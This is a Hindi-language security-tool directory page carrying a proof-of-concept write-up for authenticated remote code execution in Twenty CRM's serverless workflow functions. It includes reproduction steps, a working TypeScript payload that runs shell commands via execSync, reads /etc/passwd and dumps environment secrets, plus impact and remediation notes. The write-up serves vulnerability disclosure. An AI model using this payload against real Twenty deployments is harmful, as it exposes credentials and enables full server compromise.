Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-26720-Twenty-RCE — प्रमाण-अवधारणा (Proof-of-concept) Twenty CRM में प्रमाणित रिमोट कोड निष्पादन के लिए, अनसैंडबॉक्स्ड सर्वरलेस वर्कफ़्लो फ़ंक्शनों के माध्यम से, जो मनमाने Node.js कमांड निष्पादन और पर्यावरण चर (environment variable) प्रकटीकरण की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/dillonkirsch/cve-2026-26720-twenty-rce
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणक्लाउड सुरक्षागलत कॉन्फ़िगरेशन
GitHubdillonkirsch/cve-2026-26720-twenty-rce

CVE-2026-26720-Twenty-RCE

प्रमाण-अवधारणा (Proof-of-concept) Twenty CRM में प्रमाणित रिमोट कोड निष्पादन के लिए, अनसैंडबॉक्स्ड सर्वरलेस वर्कफ़्लो फ़ंक्शनों के माध्यम से, जो मनमाने Node.js कमांड निष्पादन और पर्यावरण चर (environment variable) प्रकटीकरण की अनुमति देता है।

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Twenty CRM - प्रमाणित रिमोट कोड निष्पादन (RCE)

अवलोकन

उत्पाद: Twenty CRM

भेद्यता: सर्वरलेस वर्कफ़्लो फ़ंक्शन के माध्यम से रिमोट कोड निष्पादन (RCE)

गंभीरता: क्रिटिकल

प्रभावित घटक: वर्कफ़्लो स्वचालन (कोड - सर्वरलेस फ़ंक्शन)

परीक्षित संस्करण: v1.15.0

यह रिपॉज़िटरी Twenty CRM वर्कफ़्लो इंजन में एक गंभीर भेद्यता का दस्तावेज़ीकरण करती है। "कोड - सर्वरलेस फ़ंक्शन" घटक प्रमाणित उपयोगकर्ताओं को मनमाना Node.js कोड निष्पादित करने की अनुमति देता है। सैंडबॉक्सिंग की कमी के कारण, child_process मॉड्यूल को आयात करना और होस्ट सर्वर पर सिस्टम-स्तरीय कमांड निष्पादित करना संभव है।

भेद्यता विवरण

एप्लिकेशन उपयोगकर्ताओं को कस्टम स्वचालन वर्कफ़्लो बनाने की अनुमति देता है जिसमें कोड निष्पादन चरण शामिल होता है। हालाँकि यह डेटा हेरफेर के लिए अभिप्रेत है, निष्पादन वातावरण Node.js बिल्ट-इन मॉड्यूल या अंतर्निहित ऑपरेटिंग सिस्टम तक पहुंच को ठीक से प्रतिबंधित नहीं करता है।

एक हमलावर child_process लाइब्रेरी से execSync का उपयोग कर सकता है:

  1. शेल कमांड निष्पादित करने के लिए (जैसे, cat, , )।
ls
whoami
  • फ़ाइल सिस्टम से संवेदनशील फ़ाइलें पढ़ने के लिए (जैसे, /etc/passwd)।
  • पर्यावरण चर (process.env) डंप करने के लिए, जिससे डेटाबेस क्रेडेंशियल, API कुंजियाँ और एप्लिकेशन रहस्य उजागर होते हैं।
  • प्रमाण-अवधारणा (PoC)

    पुनरुत्पादन के चरण

    1. Twenty CRM में लॉग इन करें।
    2. सेटिंग्स > वर्कफ़्लो पर नेविगेट करें।
    3. मैनुअल ट्रिगर के साथ एक नया वर्कफ़्लो बनाएं।
    4. एक क्रिया जोड़ें: कोड - सर्वरलेस फ़ंक्शन।
    5. कोड संपादक में निम्नलिखित TypeScript पेलोड पेस्ट करें:
    root@kitploit:~
    import { execSync } from 'child_process';
    
    export const main = async (params: any): Promise<object> => {
      try {
        // 1. रिमोट कमांड निष्पादन: सिस्टम उपयोगकर्ता पढ़ें
        const output = execSync('cat /etc/passwd').toString();
        
        // 2. सूचना प्रकटीकरण: सभी पर्यावरण चर (रहस्य) डंप करें
        const secrets = JSON.stringify(process.env);
        
        return { 
          data: output, 
          secrets: secrets 
        };
      } catch (e: any) {
        return { error: e.message };
      }
    };
    
    
    1. वर्कफ़्लो सहेजें और चलाएं।

    कोड अवलोकन

    देखा गया आउटपुट

    वर्कफ़्लो सफलतापूर्वक निष्पादित होता है और सिस्टम डेटा लौटाता है।

    सिस्टम फ़ाइल एक्सेस (/etc/passwd):

    root@kitploit:~
    root:x:0:0:root:/root:/bin/sh
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    postgres:x:70:70:PostgreSQL user:/var/lib/postgresql:/bin/sh
    ...
    
    

    लीक हुए पर्यावरण चर: process.env डंप ने महत्वपूर्ण कॉन्फ़िगरेशन विवरण उजागर किए:

    • PG_DATABASE_URL (डेटाबेस क्रेडेंशियल)
    • APP_SECRET (हस्ताक्षर कुंजियाँ)
    • REDIS_URL
    • AWS_ACCESS_KEY (यदि कॉन्फ़िगर किया गया हो)

    प्रभाव

    यह भेद्यता एक प्रमाणित उपयोगकर्ता (वर्कफ़्लो बनाने की अनुमति वाले) को पूर्ण सिस्टम समझौता प्राप्त करने की अनुमति देती है।

    • गोपनीयता: हमलावर डेटाबेस और फ़ाइल सिस्टम में सभी डेटा पढ़ सकते हैं।
    • अखंडता: हमलावर एप्लिकेशन कोड संशोधित कर सकते हैं, डेटा हटा सकते हैं, या मैलवेयर इंजेक्ट कर सकते हैं।
    • उपलब्धता: हमलावर सर्वर बंद कर सकते हैं या सभी संसाधनों का उपभोग कर सकते हैं।

    उपचार

    इस समस्या को ठीक करने के लिए, "सर्वरलेस फ़ंक्शन" सुविधा को उचित अलगाव की आवश्यकता है।

    • सैंडबॉक्सिंग लागू करें: कोड को प्रतिबंधित वातावरण में निष्पादित किया जाना चाहिए (जैसे, VM2 सैंडबॉक्स, नेटवर्क/वॉल्यूम एक्सेस के बिना एक समर्पित Docker कंटेनर, या Firecracker जैसा माइक्रो-VM)।
    • मॉड्यूल प्रतिबंधित करें: child_process, fs, और net जैसे संवेदनशील Node.js मॉड्यूल तक पहुंच अक्षम करें।
    • पर्यावरण चर सफाई: सुनिश्चित करें कि निष्पादन संदर्भ पैरेंट प्रक्रिया के पर्यावरण चर (जिसमें ऐप के रहस्य होते हैं) को विरासत में न ले।

    समयरेखा

    • 8 जनवरी, 2026: भेद्यता खोजी गई।
    • [तारीख]: Twenty CRM सुरक्षा टीम को रिपोर्ट की गई।
    • [स्थिति]: पैच की प्रतीक्षा में।
    टूल डाउनलोड करें